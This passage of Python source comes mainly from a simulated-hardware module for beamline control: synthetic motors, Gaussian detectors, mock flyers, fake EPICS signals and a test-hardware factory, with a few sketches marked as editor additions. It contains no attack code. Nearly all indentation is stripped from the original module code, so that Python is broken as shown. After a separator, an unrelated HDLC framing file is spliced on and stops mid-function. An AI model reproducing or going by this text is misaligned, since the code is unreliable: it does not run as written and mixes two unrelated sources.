velocity = Cpt(Signal, value=1, kind='config')
acceleration = Cpt(Signal, value=1, kind='config')
unused = Cpt(Signal, value=1, kind='omitted')
SUB_READBACK = 'readback'
_default_sub = SUB_READBACK
def __init__(self, *,
name,
readback_func=None, value=0, delay=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if readback_func is None:
def readback_func(x):
return x
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self.sim_state = {}
self._readback_func = readback_func
self.delay = delay
self.precision = precision
# initialize values
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.sim_state['readback'] = readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
super().__init__(name=name, parent=parent, labels=labels, kind=kind,
**kwargs)
self.readback.name = self.name
def set(self, value):
old_setpoint = self.sim_state['setpoint']
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.setpoint._run_subs(sub_type=self.setpoint.SUB_VALUE,
old_value=old_setpoint,
value=self.sim_state['setpoint'],
timestamp=self.sim_state['setpoint_ts'])
def update_state():
old_readback = self.sim_state['readback']
self.sim_state['readback'] = self._readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
self.readback._run_subs(sub_type=self.readback.SUB_VALUE,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
self._run_subs(sub_type=self.SUB_READBACK,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
st = DeviceStatus(device=self)
if self.delay:
def sleep_and_finish():
ttime.sleep(self.delay)
update_state()
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
update_state()
st.set_finished()
return st
@property
def position(self):
return self.readback.get()
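# Illustrative sketch (added by the editor, not part of the original module):
# SynAxis.set() returns a status object; with a nonzero delay the readback is updated
# on a background thread once the simulated move completes.
def _example_move_axis():
    axis = SynAxis(name='axis', delay=0.05,
                   readback_func=lambda x: x + 0.001)   # simulate a small offset
    status = axis.set(3.0)
    status.wait()                # blocks roughly `delay` seconds
    return axis.position         # readback_func(3.0) == 3.001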
class SynAxisEmptyHints(SynAxis):
@property
def hints(self):
return {}
class SynAxisNoHints(SynAxis):
readback = Cpt(_ReadbackSignal, value=0, kind='omitted')
@property
def hints(self):
raise AttributeError
class SynGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : string
motor : Device
motor_field : string
center : number
center of peak
Imax : number
max intensity of peak
sigma : number, optional
Default is 1.
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak.
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
random_state : numpy random state object, optional
        np.random.RandomState(0), to generate random numbers with a given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
def _compute(self):
m = self._motor.read()[self._motor_field]['value']
# we need to do this one at a time because
# - self.read() may be screwed with by the user
# - self.get() would cause infinite recursion
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-(m - center) ** 2 /
(2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def __init__(self, name, motor, motor_field, center, Imax,
*, random_state=None,
**kwargs):
set_later = {}
for k in ('sigma', 'noise', 'noise_multiplier'):
v = kwargs.pop(k, None)
if v is not None:
set_later[k] = v
super().__init__(name=name, **kwargs)
self._motor = motor
self._motor_field = motor_field
self.center.put(center)
self.Imax.put(Imax)
self.random_state = random_state or np.random
self.val.name = self.name
self.val.sim_set_func(self._compute)
for k, v in set_later.items():
getattr(self, k).put(v)
self.trigger()
def subscribe(self, *args, **kwargs):
return self.val.subscribe(*args, **kwargs)
def clear_sub(self, cb, event_type=None):
return self.val.clear_sub(cb, event_type=event_type)
def unsubscribe(self, cid):
return self.val.unsubscribe(cid)
def unsubscribe_all(self):
return self.val.unsubscribe_all()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
@property
def precision(self):
return self.val.precision
@precision.setter
def precision(self, v):
self.val.precision = v
@property
def exposure_time(self):
return self.val.exposure_time
@exposure_time.setter
def exposure_time(self, v):
self.val.exposure_time = v
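# Illustrative sketch (added by the editor, not part of the original module): a tiny
# step "scan" pairing a SynAxis with a SynGauss, mirroring the Example in the
# docstring above.  Each trigger re-evaluates the Gaussian at the motor's position.
def _example_scan_det_vs_motor(points=(-2, -1, 0, 1, 2)):
    motor = SynAxis(name='motor')
    det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
    readings = []
    for p in points:
        motor.set(p).wait()      # move and wait for the (instant) status
        det.trigger().wait()     # recompute the Gaussian at the new position
        readings.append(det.read()[det.val.name]['value'])
    return readings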
class Syn2DGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : str
The name of the detector
motor0 : SynAxis
The 'x' coordinate of the 2-D gaussian blob
motor_field0 : str
The name field of the motor. Should be the key in motor0.describe()
motor1 : SynAxis
The 'y' coordinate of the 2-D gaussian blob
motor_field1 : str
The name field of the motor. Should be the key in motor1.describe()
center : iterable, optional
The center of the gaussian blob
Defaults to (0,0)
Imax : float, optional
The intensity at `center`
Defaults to 1
sigma : float, optional
Standard deviation for gaussian blob
Defaults to 1
noise : {'poisson', 'uniform', None}, optional
        Add noise to the gaussian peak.
Defaults to None
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
Defaults to 1
random_state : numpy random state object, optional
        np.random.RandomState(0), to generate random numbers with a given seed
    Example
    -------
    motor1 = SynAxis(name='motor1')
    motor2 = SynAxis(name='motor2')
    det = Syn2DGauss('det', motor1, 'motor1', motor2, 'motor2',
                     center=(0, 0), Imax=1)
"""
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def _compute(self):
x = self._motor0.read()[self._motor_field0]['value']
y = self._motor1.read()[self._motor_field1]['value']
m = np.array([x, y])
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-np.sum((m - center) ** 2) / (2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
def __init__(self, name, motor0, motor_field0, motor1, motor_field1,
center, Imax, sigma=1, noise="none", noise_multiplier=1,
random_state=None, **kwargs):
super().__init__(name=name, **kwargs)
self._motor0 = motor0
self._motor1 = motor1
self._motor_field0 = motor_field0
self._motor_field1 = motor_field1
self.center.put(center)
self.Imax.put(Imax)
self.sigma.put(sigma)
self.noise.put(noise)
self.noise_multiplier.put(noise_multiplier)
if random_state is None:
random_state = np.random
self.random_state = random_state
self.val.name = self.name
self.val.sim_set_func(self._compute)
self.trigger()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
class TrivialFlyer:
"""Trivial flyer that complies to the API but returns empty data."""
name = 'trivial_flyer'
parent = None
def kickoff(self):
return NullStatus()
def describe_collect(self):
return {'stream_name': {}}
def read_configuration(self):
return OrderedDict()
def describe_configuration(self):
return OrderedDict()
def complete(self):
return NullStatus()
def collect(self):
for i in range(100):
yield {'data': {}, 'timestamps': {}, 'time': i, 'seq_num': i}
def stop(self, *, success=False):
pass
class NewTrivialFlyer(TrivialFlyer):
"""
The old-style API inserted Resource and Datum documents into a database
directly. The new-style API only caches the documents and provides an
interface (collect_asset_docs) for accessing that cache. This change was
part of the "asset refactor" that changed that way Resource and Datum
documents flowed through ophyd, bluesky, and databroker. Trivial flyer that
complies to the API but returns empty data.
"""
name = 'new_trivial_flyer'
def collect_asset_docs(self):
for _ in ():
yield _
class MockFlyer:
"""
Class for mocking a flyscan API implemented with stepper motors.
"""
def __init__(self, name, detector, motor, start, stop, num, **kwargs):
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = np.linspace(start, stop, num)
self._data = deque()
self._completion_status = None
self._lock = threading.RLock()
sentinel = object()
loop = kwargs.pop("loop", sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2,
)
if kwargs:
raise TypeError(
f"{self.__class__}.__init__ got unexpected "
f"keyword arguments {list(kwargs)}"
)
def __setstate__(self, val):
name, detector, motor, steps = val
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = steps
self._completion_status = None
def __getstate__(self):
return (self.name, self._detector, self._mot, self._steps)
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe_collect(self):
dd = dict()
dd.update(self._mot.describe())
dd.update(self._detector.describe())
return {self.name: dd}
def complete(self):
if self._completion_status is None:
raise RuntimeError("No collection in progress")
return self._completion_status
def kickoff(self):
if self._completion_status is not None and not self._completion_status.done:
raise RuntimeError("Kicking off a second time?!")
self._data = deque()
st = DeviceStatus(device=self)
self._completion_status = st
def flyer_worker():
self._scan()
st.set_finished()
threading.Thread(target=flyer_worker, daemon=True).start()
kickoff_st = DeviceStatus(device=self)
kickoff_st.set_finished()
return kickoff_st
def collect(self):
with self._lock:
data = list(self._data)
self._data.clear()
yield from data
def _scan(self):
"This will be run on a separate thread, started in self.kickoff()"
ttime.sleep(0.1)
for p in self._steps:
stat = self._mot.set(p)
stat.wait()
stat = self._detector.trigger()
stat.wait()
event = dict()
event["time"] = ttime.time()
event["data"] = dict()
event["timestamps"] = dict()
for r in [self._mot, self._detector]:
d = r.read()
for k, v in d.items():
event["data"][k] = v["value"]
event["timestamps"][k] = v["timestamp"]
with self._lock:
self._data.append(event)
def stop(self, *, success=False):
pass
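# Illustrative sketch (added by the editor, not part of the original module): the
# three-step flyer protocol as exercised against MockFlyer above.  kickoff() starts
# the scan thread, complete() returns a status that finishes when the scan is done,
# and collect() drains the buffered event dictionaries.
def _example_fly(flyer):
    flyer.kickoff().wait()        # returns immediately; the scan runs in a thread
    flyer.complete().wait()       # block until the fly scan has finished
    return list(flyer.collect())  # the accumulated {'data': ..., 'timestamps': ...} events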
class SynSignalWithRegistry(SynSignal):
"""
A SynSignal integrated with databroker.assets
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
reg : Registry, optional
DEPRECATED. If used, this is ignored and a warning is issued. In a
future release, this parameter will be removed.
save_path : str, optional
Path to save files to, if None make a temp dir, defaults to None.
save_func : function, optional
The function to save the data, function signature must be:
`func(file_path, array)`, defaults to np.save
save_spec : str, optional
The spec for the save function, defaults to 'RWFS_NPY'
save_ext : str, optional
The extension to add to the file name, defaults to '.npy'
"""
def __init__(self, *args, save_path=None,
save_func=partial(np.save, allow_pickle=False),
save_spec='NPY_SEQ', save_ext='npy', **kwargs):
super().__init__(*args, **kwargs)
self.save_func = save_func
self.save_ext = save_ext
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache = deque()
if save_path is None:
self.save_path = mkdtemp()
else:
self.save_path = save_path
self._spec = save_spec # spec name stored in resource doc
self._file_stem = None
self._path_stem = None
self._result = {}
def stage(self):
self._file_stem = short_uid()
self._datum_counter = itertools.count()
self._path_stem = os.path.join(self.save_path, self._file_stem)
# This is temporarily more complicated than it will be in the future.
# It needs to support old configurations that have a registry.
resource = {'spec': self._spec,
'root': self.save_path,
'resource_path': self._file_stem,
'resource_kwargs': {},
'path_semantics': {'posix': 'posix', 'nt': 'windows'}[os.name]}
self._resource_uid = new_uid()
resource['uid'] = self._resource_uid
self._asset_docs_cache.append(('resource', resource))
def trigger(self):
super().trigger()
# save file stash file name
self._result.clear()
for idx, (name, reading) in enumerate(super().read().items()):
# Save the actual reading['value'] to disk. For a real detector,
# this part would be done by the detector IOC, not by ophyd.
data_counter = next(self._datum_counter)
self.save_func('{}_{}.{}'.format(self._path_stem, data_counter,
self.save_ext), reading['value'])
# This is temporarily more complicated than it will be in the
# future. It needs to support old configurations that have a
# registry.
datum = {'resource': self._resource_uid,
'datum_kwargs': dict(index=data_counter)}
# If a Registry is not set, we need to generate the datum_id.
datum_id = '{}/{}'.format(self._resource_uid,
data_counter)
datum['datum_id'] = datum_id
self._asset_docs_cache.append(('datum', datum))
# And now change the reading in place, replacing the value with
# a reference to Registry.
reading['value'] = datum_id
self._result[name] = reading
return NullStatus()
def read(self):
return self._result
def describe(self):
res = super().describe()
for key in res:
res[key]['external'] = "FILESTORE"
return res
def collect_asset_docs(self):
items = list(self._asset_docs_cache)
self._asset_docs_cache.clear()
for item in items:
yield item
def unstage(self):
self._resource_uid = None
self._datum_counter = None
self._asset_docs_cache.clear()
self._file_stem = None
self._path_stem = None
self._result.clear()
class NumpySeqHandler:
specs = {'NPY_SEQ'}
def __init__(self, filename, root=''):
self._name = os.path.join(root, filename)
def __call__(self, index):
return np.load('{}_{}.npy'.format(self._name, index),
allow_pickle=False)
def get_file_list(self, datum_kwarg_gen):
"This method is optional. It is not needed for access, but for export."
return ['{name}_{index}.npy'.format(name=self._name, **kwargs)
for kwargs in datum_kwarg_gen]
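# Illustrative sketch (added by the editor, not part of the original module): one
# round trip through SynSignalWithRegistry and NumpySeqHandler.  stage() emits a
# 'resource' document, trigger() writes one .npy file and emits a matching 'datum',
# and the handler reloads the array from the datum's index.
def _example_registry_round_trip():
    det = SynSignalWithRegistry(func=lambda: np.ones((4, 4)), name='img')
    det.stage()
    det.trigger()
    (_, resource), (_, datum) = det.collect_asset_docs()
    handler = NumpySeqHandler(resource['resource_path'], root=resource['root'])
    array = handler(**datum['datum_kwargs'])   # loads the saved 4x4 array
    det.unstage()
    return array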
class ABDetector(Device):
a = Cpt(SynSignal, func=random.random, kind=Kind.hinted)
b = Cpt(SynSignal, func=random.random)
def trigger(self):
return self.a.trigger() & self.b.trigger()
class DetWithCountTime(Device):
intensity = Cpt(SynSignal, func=lambda: 0, kind=Kind.hinted)
count_time = Cpt(Signal)
class DetWithConf(Device):
a = Cpt(SynSignal, func=lambda: 1, kind=Kind.hinted)
b = Cpt(SynSignal, func=lambda: 2, kind=Kind.hinted)
c = Cpt(SynSignal, func=lambda: 3)
d = Cpt(SynSignal, func=lambda: 4)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read_attrs = ['a', 'b']
self.configuration_attrs = ['c', 'd']
def trigger(self):
return self.a.trigger() & self.b.trigger()
class InvariantSignal(SynSignal):
# Always returns the same reading, including timestamp.
def read(self):
res = super().read()
for k in res:
res[k]['timestamp'] = 0
return res
def __repr__(self):
return "<INVARIANT REPR>"
class SPseudo3x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), egu='a', kind=Kind.hinted)
pseudo2 = Cpt(PseudoSingle, limits=(-10, 10), egu='b', kind=Kind.hinted)
pseudo3 = Cpt(PseudoSingle, limits=None, egu='c', kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
sig = Cpt(Signal, value=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo2,
real3=-pseudo_pos.pseudo3)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1,
pseudo2=-real_pos.real2,
pseudo3=-real_pos.real3)
class SPseudo1x3(PseudoPositioner):
pseudo1 = Cpt(PseudoSingle, limits=(-10, 10), kind=Kind.hinted)
real1 = Cpt(SoftPositioner, init_pos=0)
real2 = Cpt(SoftPositioner, init_pos=0)
real3 = Cpt(SoftPositioner, init_pos=0)
@pseudo_position_argument
def forward(self, pseudo_pos):
pseudo_pos = self.PseudoPosition(*pseudo_pos)
# logger.debug('forward %s', pseudo_pos)
return self.RealPosition(real1=-pseudo_pos.pseudo1,
real2=-pseudo_pos.pseudo1,
real3=-pseudo_pos.pseudo1)
@real_position_argument
def inverse(self, real_pos):
real_pos = self.RealPosition(*real_pos)
# logger.debug('inverse %s', real_pos)
return self.PseudoPosition(pseudo1=-real_pos.real1)
class SynAxisNoPosition(SynAxis):
@property
def position(self):
raise AttributeError
def make_fake_device(cls):
"""
Inspect cls and construct a fake device that has the same structure.
This works by replacing EpicsSignal with FakeEpicsSignal and EpicsSignalRO
with FakeEpicsSignalRO. The fake class will be a subclass of the real
class.
This assumes that EPICS connections are done entirely in EpicsSignal and
EpicsSignalRO subcomponents. If this is not true, this will fail silently
on class construction and loudly when manipulating an object.
Parameters
----------
cls : Device
A real Device class to inspect and create a fake Device class from
Returns
-------
fake_device : Device
The resulting fake Device class
"""
# Cache to avoid repeating work.
# EpicsSignal and EpicsSignalRO begin in the cache.
if cls not in fake_device_cache:
if not issubclass(cls, Device):
# Ignore non-devices and non-epics-signals
logger.debug('Ignore cls=%s, bases are %s', cls, cls.__bases__)
fake_device_cache[cls] = cls
return cls
fake_dict = {}
# Update all the components recursively
for cpt_name in cls.component_names:
cpt = getattr(cls, cpt_name)
if isinstance(cpt, DDCpt):
# Make a regular Cpt out of the DDC, as it already has
# been generated
fake_cpt = Cpt(cls=cpt.cls, suffix=cpt.suffix,
lazy=cpt.lazy,
trigger_value=cpt.trigger_value,
kind=cpt.kind, add_prefix=cpt.add_prefix,
doc=cpt.doc, **cpt.kwargs,
)
else:
fake_cpt = copy.copy(cpt)
fake_cpt.cls = make_fake_device(cpt.cls)
logger.debug('switch cpt_name=%s to cls=%s', cpt_name,
fake_cpt.cls)
fake_dict[cpt_name] = fake_cpt
fake_class = type('Fake{}'.format(cls.__name__), (cls,), fake_dict)
fake_device_cache[cls] = fake_class
logger.debug('fake_device_cache[%s] = %s', cls, fake_class)
return fake_device_cache[cls]
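# Illustrative sketch (added by the editor, not part of the original module): a
# hypothetical Device built from EpicsSignal components, converted with
# make_fake_device so it can be exercised without any EPICS connection.  The prefix
# 'SIM:STAGE' and the sim_put value are arbitrary.
class _ExampleStage(Device):
    x = Cpt(EpicsSignal, ':X')
    y = Cpt(EpicsSignal, ':Y')

def _example_fake_stage():
    FakeStage = make_fake_device(_ExampleStage)
    stage = FakeStage('SIM:STAGE', name='stage')
    stage.x.sim_put(1.5)          # FakeEpicsSignal adds sim_put for test setup
    return stage.x.get()          # 1.5, no PV involved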
def clear_fake_device(dev, *, default_value=0, default_string_value='',
ignore_exceptions=False):
'''Clear a fake device by setting all signals to a specific value
Parameters
----------
dev : Device
The fake device
default_value : any, optional
The value to put to non-string components
default_string_value : any, optional
The value to put to components determined to be strings
ignore_exceptions : bool, optional
Ignore any exceptions raised by `sim_put`
Returns
-------
all_values : list
List of all (signal_instance, value) that were set
'''
all_values = []
for walk in dev.walk_signals(include_lazy=True):
sig = walk.item
if not hasattr(sig, 'sim_put'):
continue
try:
string = getattr(sig, 'as_string', False)
value = (default_string_value
if string
else default_value)
sig.sim_put(value)
except Exception:
if not ignore_exceptions:
raise
else:
all_values.append((sig, value))
return all_values
def instantiate_fake_device(dev_cls, *, name=None, prefix='_prefix',
**specified_kw):
'''Instantiate a fake device, optionally specifying some initializer kwargs
If unspecified, all initializer keyword arguments will default to the
string f"_{argument_name}_".
Parameters
----------
dev_cls : class
The device class to instantiate. This is allowed to be a regular
device, as `make_fake_device` will be called on it first.
name : str, optional
The instantiated device name
prefix : str, optional
The instantiated device prefix
**specified_kw :
Keyword arguments to override with a specific value
Returns
-------
dev : dev_cls instance
The instantiated fake device
'''
dev_cls = make_fake_device(dev_cls)
sig = inspect.signature(dev_cls)
ignore_kw = {'kind', 'read_attrs', 'configuration_attrs', 'parent',
'args', 'name', 'prefix'}
def get_kwarg(name, param):
default = param.default
if default == param.empty:
# NOTE: could check param.annotation here
default = '_{}_'.format(param.name)
return specified_kw.get(name, default)
kwargs = {name: get_kwarg(name, param)
for name, param in sig.parameters.items()
if param.kind != param.VAR_KEYWORD and
name not in ignore_kw
}
kwargs['name'] = (name if name is not None else dev_cls.__name__)
kwargs['prefix'] = prefix
return dev_cls(**kwargs)
class FakeEpicsSignal(SynSignal):
"""
Fake version of EpicsSignal that's really just a SynSignal.
    Whereas SynSignal is generally used to test plans, FakeEpicsSignal is
generally used in conjunction with make_fake_device to test any logic
inside of a Device subclass.
Unlike in SynSignal, this class is generally instantiated inside of a
subcomponent generated automatically by make_fake_device. This means we
need extra hooks for modifying the signal's properties after the class
instantiates.
We can emulate EpicsSignal features here. We currently emulate the put
limits and some enum handling.
"""
def __init__(self, read_pv, write_pv=None, *, put_complete=False,
string=False, limits=False, auto_monitor=False, name=None,
**kwargs):
"""
Mimic EpicsSignal signature
"""
self.as_string = string
self._enum_strs = None
super().__init__(name=name, **kwargs)
self._use_limits = limits
self._put_func = None
self._limits = None
self._metadata.update(
connected=True,
)
def describe(self):
desc = super().describe()
if self._enum_strs is not None:
desc[self.name]['enum_strs'] = self.enum_strs
return desc
def sim_set_putter(self, putter):
"""
        Define arbitrary behavior on signal put.
This can be used to emulate basic IOC behavior.
"""
self._put_func = putter
def get(self, *, as_string=None, connection_timeout=1.0, **kwargs):
"""
Implement getting as enum strings
"""
if as_string is None:
as_string = self.as_string
value = super().get()
if as_string:
if self.enum_strs is not None and isinstance(value, int):
return self.enum_strs[value]
elif value is not None:
return str(value)
return value
def put(self, value, *args, **kwargs):
"""
Implement putting as enum strings and put functions
"""
if self.enum_strs is not None:
if value in self.enum_strs:
value = self.enum_strs.index(value)
elif isinstance(value, str):
err = '{} not in enum strs {}'.format(value, self.enum_strs)
raise ValueError(err)
if self._put_func is not None:
return self._put_func(value, *args, **kwargs)
return super().put(value, *args, **kwargs)
def sim_put(self, *args, **kwargs):
"""
Update the read-only signal's value.
Implement here instead of FakeEpicsSignalRO so you can call it with
every fake signal.
"""
force = kwargs.pop('force', True)
# The following will emit SUB_VALUE:
ret = Signal.put(self, *args, force=force, **kwargs)
# Also, ensure that SUB_META has been emitted:
self._run_subs(sub_type=self.SUB_META, **self._metadata)
return ret
@property
def enum_strs(self):
"""
Simulated enum strings.
Use sim_set_enum_strs during setup to set the enum strs.
"""
return self._enum_strs
def sim_set_enum_strs(self, enums):
"""
Set the enum_strs for a fake device
Parameters
----------
enums: list or tuple of str
The enums will be accessed by array index, e.g. the first item in
enums will be 0, the next will be 1, etc.
"""
self._enum_strs = tuple(enums)
self._metadata['enum_strs'] = tuple(enums)
self._run_subs(sub_type=self.SUB_META, **self._metadata)
@property
def limits(self):
return self._limits
def sim_set_limits(self, limits):
"""
Set the fake signal's limits.
"""
self._limits = limits
def check_value(self, value):
"""
Implement some of the checks from EpicsSignal
"""
super().check_value(value)
if value is None:
raise ValueError('Cannot write None to EPICS PVs')
if self._use_limits and not self.limits[0] <= value <= self.limits[1]:
raise LimitError(f'value={value} not within limits {self.limits}')
class FakeEpicsSignalRO(SynSignalRO, FakeEpicsSignal):
"""
Read-only FakeEpicsSignal
"""
pass
class FakeEpicsSignalWithRBV(FakeEpicsSignal):
"""
FakeEpicsSignal with PV and PV_RBV; used in the AreaDetector PV naming
scheme
"""
def __init__(self, prefix, **kwargs):
super().__init__(prefix + '_RBV', write_pv=prefix, **kwargs)
fake_device_cache = {EpicsSignal: FakeEpicsSignal,
EpicsSignalRO: FakeEpicsSignalRO,
EpicsSignalWithRBV: FakeEpicsSignalWithRBV,
}
class DirectImage(Device):
img = Cpt(SynSignal, kind='hinted')
def __init__(self, *args, func=None, **kwargs):
super().__init__(*args, **kwargs)
if func is not None:
self.img.sim_set_func(func)
def trigger(self):
return self.img.trigger()
def hw(save_path=None):
"Build a set of synthetic hardware (hence the abbreviated name, hw)"
motor = SynAxis(name='motor', labels={'motors'})
motor1 = SynAxis(name='motor1', labels={'motors'})
motor2 = SynAxis(name='motor2', labels={'motors'})
motor3 = SynAxis(name='motor3', labels={'motors'})
jittery_motor1 = SynAxis(name='jittery_motor1',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
jittery_motor2 = SynAxis(name='jittery_motor2',
readback_func=lambda x: x + np.random.rand(),
labels={'motors'})
noisy_det = SynGauss('noisy_det', motor, 'motor', center=0, Imax=1,
noise='uniform', sigma=1, noise_multiplier=0.1,
labels={'detectors'})
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
identical_det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1,
labels={'detectors'})
det1 = SynGauss('det1', motor1, 'motor1', center=0, Imax=5, sigma=0.5,
labels={'detectors'})
det2 = SynGauss('det2', motor2, 'motor2', center=1, Imax=2, sigma=2,
labels={'detectors'})
det3 = SynGauss('det3', motor3, 'motor3', center=-1, Imax=2, sigma=1,
labels={'detectors'})
det4 = Syn2DGauss('det4', motor1, 'motor1', motor2, 'motor2',
center=(0, 0), Imax=1, labels={'detectors'})
det5 = Syn2DGauss('det5', jittery_motor1, 'jittery_motor1', jittery_motor2,
'jittery_motor2', center=(0, 0), Imax=1,
labels={'detectors'})
flyer1 = MockFlyer('flyer1', det, motor, 1, 5, 20)
flyer2 = MockFlyer('flyer2', det, motor, 1, 5, 10)
trivial_flyer = TrivialFlyer()
new_trivial_flyer = NewTrivialFlyer()
ab_det = ABDetector(name='det', labels={'detectors'})
# area detector that directly stores image data in Event
direct_img = DirectImage(func=lambda: np.array(np.ones((10, 10))),
name='direct', labels={'detectors'})
direct_img.img.name = 'img'
direct_img_list = DirectImage(func=lambda: [[1] * 10] * 10,
name='direct', labels={'detectors'})
direct_img_list.img.name = 'direct_img_list'
# area detector that stores data in a file
img = SynSignalWithRegistry(func=lambda: np.array(np.ones((10, 10))),
name='img', labels={'detectors'},
save_path=save_path)
invariant1 = InvariantSignal(func=lambda: 0, name='invariant1',
labels={'detectors'})
invariant2 = InvariantSignal(func=lambda: 0, name='invariant2',
labels={'detectors'})
det_with_conf = DetWithConf(name='det', labels={'detectors'})
det_with_count_time = DetWithCountTime(name='det', labels={'detectors'})
rand = SynPeriodicSignal(name='rand', labels={'detectors'})
rand2 = SynPeriodicSignal(name='rand2', labels={'detectors'})
motor_no_pos = SynAxisNoPosition(name='motor', labels={'motors'})
bool_sig = Signal(value=False, name='bool_sig', labels={'detectors'})
motor_empty_hints1 = SynAxisEmptyHints(name='motor1', labels={'motors'})
motor_empty_hints2 = SynAxisEmptyHints(name='motor2', labels={'motors'})
motor_no_hints1 = SynAxisNoHints(name='motor1', labels={'motors'})
motor_no_hints2 = SynAxisNoHints(name='motor2', labels={'motors'})
# Because some of these reference one another we must define them (above)
# before we pack them into a namespace (below).
signal = SynSignal(name='signal')
return SimpleNamespace(
motor=motor,
motor1=motor1,
motor2=motor2,
motor3=motor3,
jittery_motor1=jittery_motor1,
jittery_motor2=jittery_motor2,
noisy_det=noisy_det,
det=det,
identical_det=identical_det,
det1=det1,
det2=det2,
det3=det3,
det4=det4,
det5=det5,
flyer1=flyer1,
flyer2=flyer2,
trivial_flyer=trivial_flyer,
new_trivial_flyer=new_trivial_flyer,
ab_det=ab_det,
direct_img=direct_img,
direct_img_list=direct_img_list,
img=img,
invariant1=invariant1,
invariant2=invariant2,
pseudo3x3=SPseudo3x3(name='pseudo3x3'),
pseudo1x3=SPseudo1x3(name='pseudo1x3'),
sig=Signal(name='sig', value=0),
det_with_conf=det_with_conf,
det_with_count_time=det_with_count_time,
rand=rand,
rand2=rand2,
motor_no_pos=motor_no_pos,
motor_empty_hints1=motor_empty_hints1,
motor_empty_hints2=motor_empty_hints2,
motor_no_hints1=motor_no_hints1,
motor_no_hints2=motor_no_hints2,
bool_sig=bool_sig,
signal=signal,
)
# Dump instances of the example hardware generated by hw() into the global
# namespace for convenience and back-compat.
globals().update(hw().__dict__)
|
SimpleHDLC.py
|
#!/usr/bin/python
# coding: utf8
__version__ = '0.2'
import logging
import struct
import time
from threading import Thread
from PyCRC.CRCCCITT import CRCCCITT
import sys
logger = logging.getLogger(__name__)
def calcCRC(data):
crc = CRCCCITT("FFFF").calculate(bytes(data))
b = bytearray(struct.pack(">H", crc))
return b
class Frame(object):
STATE_READ = 0x01
STATE_ESCAPE = 0x02
def __init__(self):
self.finished = False
self.error = False
self.state = self.STATE_READ
self.data = bytearray()
self.crc = bytearray()
self.reader = None
def __len__(self):
return len(self.data)
def addByte(self, b):
if b == 0x7D:
self.state = self.STATE_ESCAPE
elif self.state == self.STATE_ESCAPE:
self.state = self.STATE_READ
b = b ^ 0x20
self.data.append(b)
else:
self.data.append(b)
def finish(self):
self.crc = self.data[-2:]
self.data = self.data[:-2]
self.finished = True
def checkCRC(self):
res = bool(self.crc == calcCRC(self.data))
